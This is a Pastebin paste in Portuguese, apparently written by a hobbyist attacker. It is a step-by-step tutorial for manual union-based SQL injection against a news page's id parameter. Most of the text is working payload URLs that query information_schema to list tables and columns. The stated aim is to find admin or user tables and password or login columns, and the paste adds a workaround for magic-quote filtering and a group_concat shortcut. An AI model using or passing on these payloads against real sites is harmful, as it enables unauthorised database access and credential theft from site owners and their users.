API tools faq
paste
Advertisement
syst3m_h4x0r

Sql Injection Manual Básico

syst3m_h4x0r
Jan 22nd, 2019
22,233
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
raw download clone embed print report
  1. Sql Injection Avançado:
  2. INFORMATION_SCHEMA
  3. Como já expliquei para vocês, agora iremos capturar do banco de dados as tabelas e as colunas do banco de dados de um site
  4. fictício.
  5. Supomos que temos a seguinte notícias:
  6. www.site.com.br/noticias.php?id=15
  7. Já vimos que ele está vulnerável a SQL Injection e possui 6 colunas. Agora iremos descobrir as tabelas do site através do
  8. information_schema, o conteúdo de nossa materia!
  9. Para isto iremos utilizar um union:
  10. www.site.com.br/noticias.php?id=-15+Union+Select+1,2,3,4,5,6+From+Information_Schema.Tables
  11. Notem que apareceram alguns números na tela, no nosso caso: 2,5,3
  12. Agora vamos fazer o seguinte, no lugar destes números iremos colocar as tabelas do information_schema, adicionando um “limite”:
  13. http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 0,1
  14. Agora você vai aumentando o limite para 1,1 / 2,1 / 3,1 / 4,1 até encontrar alguma tabela tipo: admin, usuarios, user, membros.
  15. administradores, bd_admin, db_admin etc…
  16. Vamos supor agora que encontramos a tabela “usuarios” em 20,1:
  17. http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 20,1
  18. Agora iremos achar as colunas da tabela “usuarios”:
  19. http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+Where
  20. Table.name=’usuarios’+limit+0,1
  21. (Lembrando que este método não funcionará se existir filtragem magic quote no site)
  22. Caso a filtragem esteja ativa poderemos utilizar assim e ver uma por uma:
  23. http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+limit+0,1
  24. E então ir procurando até encontrar as colunas: senha, usuario, username, login, password, user, email etc
  25. CONCLUSÃO
  26. Neste tutorial ensinei vocês a descobrirem as tabelas e as colunas de um banco de dados utilizando o information_schema! Com este
  27. método você não é obrigado a ir chutando nomes de tabelas e colunas até encontrar ela, ou utilizar algum programa específico. Você
  28. faz manualmente. Aí está a verdadeira arte do SQL Injection!
  29. Esta matéria eu fiz agora, não elaborei muito, então se houver algum erro avisem hehehe
  30. Espero que todos tenham gostado e que ela seja bastante útil!
  31. Também complementando outro método que não coloquei na matéria:
  32. www.site.com.br/noticias.php?id=-15+Union+Select+1,Group_Concat(Table_Name),3,4,5,6+from+information_schema.tables+where+table_schema=database()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!